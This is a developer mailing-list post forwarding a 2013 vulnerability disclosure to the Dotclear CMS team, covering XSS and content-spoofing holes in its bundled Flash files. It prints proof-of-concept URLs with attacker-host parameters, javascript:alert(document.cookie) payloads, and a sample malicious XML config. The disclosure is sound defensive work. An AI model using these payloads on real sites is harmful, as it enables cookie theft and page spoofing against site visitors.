[Dotclear Dev] Fwd: XSS and CS vulnerabilities in Dotclear

Voilà la réponse à ma question de ce matin, je vous laisse le soin de gérer ça, j'suis à l'ouest point de vue question sécu là (pas encore bien compris les tenants et les aboutissants de ces failles ni leur dangerosités potentielles). ---------- Forwarded message ---------- From: MustLive <mustliveua(a)gmail.com&gt; Date: 2013/4/12 Subject: Re: XSS and CS vulnerabilities in Dotclear To: "Dotclear (contact)" <contact(a)dotclear.net&gt; ** *Hi guys!* You are welcome!. I was trying to help you yet in 14th of January :-). But it looks like you haven't received my letter (I always deal with not serious people who don't receive my letters due to their lame antispam filters, but it's their own problem and everyone must do everything to receive letters from other people, make sure that antispam filters work correctly - remove spam, but left normal letters, especially allow security related letters). This is strange, that you haven't received my letter from 14th of June, but received letter from 9th of April. Exactly because I've not received answer from my letter from 10.04, I've send new letter yesterday from another my e-mail (from gmail), which I was using for many years specially for such cases, when I see people not received my letters (with no responses or there are "returns" that filters don't allow letters from my e-mail, to bypass such lame filters). This letter I'm sending from my gmail account for sure. Because I was planning to disclose this letter this week, since almost three months passed since informing you in January, so I've reminded you three days ago. First I planned to disclose it in Tuesday evening, but because it turned out that you have fixed (and badly) only holes in SWFUpload, then I postponed it to Wednesday, then to Thursday and now to Friday evening. But I'm planning to do it at last this evening (and will write to security lists tomorrow), so you need to fix today these holes in swf already ;-). After I saw that you have fixed only holes in SWFUpload and mentioned only about it, I begun thinking that you haven't received my letter in January. And you became aware about holes SWFUpload related to Dotclear after my advisories in November and March. But in that my letter I wrote about much more holes in your engine (in all three swf-files). I'm resending my January's letter bellow. Note that in letter I've not wrote much details of holes in player_mp3.swf to make the letter more laconical. Anyway holes are similar to player_flv.swf - all CS holes are similar for both these flash applications and there are no XSS holes in mp3 player. Here are details for player_mp3.swf, so it'll be more obvious for you (xml and txt config files are similar for both these flashes). *Content Spoofing (WASC-12):* http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3 Certainly give me any URL of web site on Dotclear 2.5, so I can check your protection against attacks on swf-files. Note that your protection, on which you referenced (that you made it in version 2.5), is only for Apache and not for other web servers. As I've checked yesterday, you have used .htaccess to block access to files (including swf files). But .htaccess works only in Apache and on nginx and other web servers your engine will not be protected, and all XSS and CS holes in these three flashes can be used for attacks. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua ----- Original Message ----- *From:* MustLive <mustlive(a)websecurity.com.ua&gt; *To:* contact(a)dotclear.net *Sent:* Monday, January 14, 2013 12:57 AM *Subject:* XSS and Content Spoofing vulnerabilities in Dotclear *Hello developers of Dotclear!* I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in Dotclear. After I've wrote about Magazeen theme for WordPress and Dotclear (which was using vulnerable TimThumb), here are new vulnerabilities related to Dotclear. I mentioned about these vulnerabilities in Magazeen theme at my site ( http://websecurity.com.ua/5120/) in 2011. You can read on English: about vulnerabilities in TimThumb and in multiples themes for different engines ( http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080258.html) and about vulnerabilities in Magazeen theme ( http://lists.grok.org.uk/pipermail/full-disclosure/2011-May/080659.html). These were Cross-Site Scripting (WASC-08), Full path disclosure (WASC-13), Abuse of Functionality (WASC-42) and Denial of Service (WASC-10) vulnerabilities in TimThumb and later also Arbitrary File Uploading (WASC-31) vulnerability. And now I'm informing you about Cross-Site Scripting and Content Spoofing in core of your CMS. Your engine has three swf files (according to your site http://dev.dotclear.org/2.0/browser/inc/swf), I suppose last version Dotclear 2.4.4 too. And these file are vulnerable to XSS and CS, so your engine has these holes. File swfupload.swf it's Swfupload and it has XSS vulnerability. I've wrote about swfupload.swf in different engines, including in Dotclear, at my site (http://websecurity.com.ua/6144/) in 2012. *Cross-Site Scripting (WASC-08):* http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)s... File player_flv.swf it's FLV Player and it has a lot of vulnerabilities. I've wrote about vulnerabilities in FLV Player in advisory at my site (http://websecurity.com.ua/5098/) in 2011. On English ( http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082321.html). *Cross-Site Scripting (WASC-08):* http://site<http://site/dotclear/inc/swf/player_flv.swf?onclick=javasc... /inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)<http://site/dotclear/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)> *Content Spoofing (WASC-12):* http://site<http://site/dotclear/inc/swf/player_flv.swf?onclick=javasc... /inc/swf/player_flv.swf?configxml=http://attacker/1.xml<http://www.noslibertes.org/dotclear/inc/swf/player_flv.swf?configxml=http://attacker/1.xml> Here are all holes in FLV Player. *Content Spoofing (WASC-12):* http://site/player_flv_classic.swf?configxml=http://site/1.xml http://site/player_flv_maxi.swf?configxml=http://site/1.xml http://site/player_flv_classic.swf?config=http://site/1.txt http://site/player_flv_maxi.swf?config=http://site/1.txt http://site/player_flv_classic.swf?flv=http://site/film.flv&startimag... http://site/player_flv_maxi.swf?flv=http://site/film.flv&startimage=h... http://site/player_flv_mini.swf?flv=http://site/film.flv *XSS (WASC-08):* http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)... http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.c... http://site/player_flv_maxi.swf?configxml=http://site/xss.xml File xss.xml <?xml version="1.0" encoding="UTF-8"?> <config> <param name="onclick" value="javascript:alert(document.cookie)" /> <param name="ondoubleclick" value="javascript:alert(document.cookie)" /> </config> http://site/player_flv_maxi.swf?config=http://site/xss.txt File xss.txt onclick=javascript:alert(document.cookie) ondoubleclick=javascript:alert(document.cookie) The code will execute after a click (or double click). It's strictly social XSS. File player_flv.swf it's some mp3 player, but it has similar holes as FLV Player (if not all, then many of above-mentioned holes). *Content Spoofing (WASC-12):* http://site<http://site/dotclear/inc/swf/player_flv.swf?onclick=javasc... /inc/swf/player_mp3.swf?configxml=http://attacker/1.xml<http://www.noslibertes.org/dotclear/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml> Vulnerable are all versions of Dotclear - Dotclear 2.4.4 and previous versions. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua ----- Original Message ----- *From:* Dotclear (contact) <contact(a)dotclear.net&gt; *To:* MustLive <mustliveua(a)gmail.com&gt; *Sent:* Friday, April 12, 2013 8:22 AM *Subject:* Re: XSS and CS vulnerabilities in Dotclear Hi, Of course we will not leave any vulnerabilities in our script, as far as possible, and we would like to know exactly what are the other holes you talked about (in two other swf-files). Could you explain us what they are ? We have also looked carefully in our two different mail archive and cannot found any mail from you on last 14 january 2013. We heard about this problems in swfupload by another way. If it was the case we, as usual, thanks you in a way or another, be sure about this. Thanks a lot for helping us. Franck for DC Team 2013/4/11 MustLive <mustliveua(a)gmail.com&gt;